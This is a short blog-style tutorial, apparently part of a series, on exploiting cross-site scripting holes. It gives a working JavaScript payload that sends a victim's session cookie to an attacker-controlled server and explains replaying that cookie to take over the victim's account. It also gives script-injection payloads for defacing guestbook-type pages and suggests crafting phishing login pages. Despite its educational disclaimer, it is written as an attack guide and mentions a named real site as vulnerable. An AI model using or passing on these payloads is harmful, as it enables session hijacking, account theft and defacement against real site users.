Please note that this article is for educational purposes only, and is targeted at webmasters who have never seen this scenario. Please donot harm anyone.
Disclaimer : I am not responsible for any damages arising due to methods specified in this page. Webmasters please fix it ASAP.
Cookie Stealing using XSS
Cookie is used to manage sessions in browsers. Each person logged in gets a unique cookie, it is like a key to the site. So if you can get hold of this cookie, you have the key to enter the site. The site will welcome as the person from whom you stealed the cookie. Now let us look how to grab the cookie using cross site scripting.
For cookie stealing there must be an xss hole which can be injected through the url of the page like the one on propmart.com we discussed in first part.
Now to get the cookie to this page we would have to embed the following
var i=new Image();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;
This code will send the cookies to your server. Now embeding the script in url can be done as discussed in part 1.
Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in firefox with the cookie editor plugin.
Just a refresh will certainly get you in, if you are not too late (Cookie expires after sometime).
Defacing a website
To deface a website , the site must have a system which puts something you submit on their site (like guestbooks, feedbacks). Now if there is an XSS hole in such a page, you can embed the script to deface.
<script src="(location of script)"></script>
- OR -
document.body.innerHTML="<h1>XSS Defacing</h1>your HTML code here";
Either you can deface or craft a login page, which results in phishing.
Since it is dangerous to mention any examples, find out yourselves ...
Further reading and new XSS holes on
Let the world know ... post a comment.